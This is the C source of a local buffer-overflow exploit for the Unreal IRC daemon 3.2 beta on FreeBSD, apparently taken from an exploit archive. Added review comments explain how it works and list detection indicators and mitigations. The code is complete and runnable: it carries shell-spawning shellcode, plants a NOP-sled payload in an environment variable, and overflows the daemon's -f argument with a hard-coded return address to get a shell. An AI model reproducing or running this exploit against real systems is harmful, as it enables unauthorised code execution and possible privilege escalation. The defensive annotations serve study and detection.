Local exploit for Unreal IRC daemon 3.2.
e50479b8ae3686d516f7edd3b95bdd081d79cb14541fca5c08905c7229d76008
/* Unreal irc daemon 3.2 beta exploit code by Rave (FreeBSD)
* Dtors Just never stops pumping
* Rave@dtors.net
* Private !!!!!
* ---------------------------------------------------
* Dtors Security Research (DSR)
* Code by: Rave
* Mail: rave@dtors.net
* ---------------------------------------------------
* Shellcode located at: 0xbfbffdb4
* Ik got a litle something for you
* Its a Shell :-)
*
* sh-2.05$ id
* uid=500(Rave) gid=100(users) groups=100(users)
* sh-2.05$
*/
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
/* Hard-coded 32-bit address that main() writes into the last four bytes of
 * the -f argument. The file header prints the same value as "Shellcode
 * located at"; presumably it is where the author expected the "Dsr"
 * environment string to sit in the target process -- TODO confirm.
 * NOTE(review): a fixed address like this is only meaningful where the
 * process layout is identical from run to run; address-space randomization
 * invalidates it. */
#define ret 0xbfbffdb4
/* Filler byte (0x90, the x86 one-byte no-op) used by blaat() to pad the
 * environment value in front of the payload. */
#define NOP 0x90
/* Opaque machine-code payload that blaat() copies into the environment.
 * The bytes include the ASCII strings "//sh" and "/bin" and several
 * 0xcd 0x80 (int 0x80) sequences, which is consistent with the header's
 * statement that a shell is started. The code measures it with strlen(),
 * so it depends on the payload containing no zero byte.
 * NOTE(review): for detection, the fixed byte string is a usable signature
 * when it appears in a process environment or command line. */
char shellcode []="\x31\xc0\x31\xdb\x31\xc9\x50\x53\x51\xb0\x7e\xcd\x80\x31\xc0"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54"
"\x24\x08\x50\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd"
"\x80\xc9\xc3";
/* Builds a 300-byte environment value named "Dsr": NOP filler followed by
 * the payload, so that the payload ends exactly at offset 300.
 * Takes no arguments. Declared int, but no value is returned and the caller
 * ignores the result.
 * NOTE(review): a long environment value that is mostly 0x90 bytes is an
 * easy thing to flag when auditing process environments. */
int blaat(){
/* 500-byte scratch buffer; only the first 301 bytes are written. */
char envbuff[500],*ptr;
int i;
/* Fill the front with NOP bytes, leaving room for the payload before
 * offset 300. */
for (i=0;i < 300-strlen(shellcode);i++)
envbuff[i]=NOP;
/* Copy the payload byte by byte (without its terminator) behind the filler. */
ptr=envbuff+300-strlen(shellcode);
for (i=0;i < strlen(shellcode);i++)
*(ptr++)=shellcode[i];
/* Terminate the value at offset 300 so setenv() sees a C string. */
ptr =envbuff+300;
*ptr='\0' ;
/* Export it, overwriting any existing "Dsr" variable (third argument 1);
 * the program started by main() inherits this environment. */
setenv("Dsr",envbuff,1);
}
/* Proof-of-concept driver: plants the "Dsr" environment value, builds an
 * overlong value for the daemon's -f option, prints a banner, and replaces
 * this process with ./ircd from the current directory.
 *
 * NOTE(review): the page does not show the vulnerable ircd code. The
 * construction (about 1 KB of filler ending in an address) suggests the
 * daemon copies the -f argument into a fixed-size stack buffer without a
 * length check -- confirm against the ircd source before relying on this.
 * NOTE(review): the sample session in the file header shows uid=500, an
 * ordinary account, so what is demonstrated is code execution as the
 * invoking user. A privilege boundary is crossed only if ircd is installed
 * setuid/setgid or otherwise runs with more privilege than its caller.
 * Mitigations a defender would check: ircd not setuid, the -f path length
 * bounded before any copy, non-executable stack, and address-space
 * randomization (which defeats the hard-coded `ret`). */
int main(){
char buffer[1025];
int i;
/* Export the environment payload first so the exec'd daemon inherits it. */
blaat();
/* Bytes 0..1023 become 'A' (0x41) filler. */
memset(buffer,0x41,1024);
/* Overwrite the last four bytes (indexes 1021..1024) with `ret`, least
 * significant byte first. */
buffer[1021]=(ret&0x000000ff);
buffer[1022]=(ret&0x0000ff00) >> 8;
buffer[1023]=(ret&0x00ff0000) >> 16;
buffer[1024]=(ret&0xff000000) >> 24;
/* Banner output only; nothing below affects the argument or environment. */
printf("\n---------------------------------------------------\n");
printf("Dtors Security Research (DSR) \n");
printf("Code by: Rave\n");
printf("Mail: rave@dtors.net\n");
printf("---------------------------------------------------\n");
printf("Shellcode located at: 0x%x\n",ret);
printf("Ik got a litle something for you\n");
printf("\t\t\t\t\tIts a Shell :-)\n");
/* Replace this process with ./ircd, passing the crafted buffer as the value
 * of -f. The return value of execl() is not checked.
 * NOTE(review): an ircd started with a roughly 1 KB -f value made of
 * repeated 'A' bytes is a clear process-audit indicator. */
execl("./ircd","ircd","-f",buffer,NULL);\
}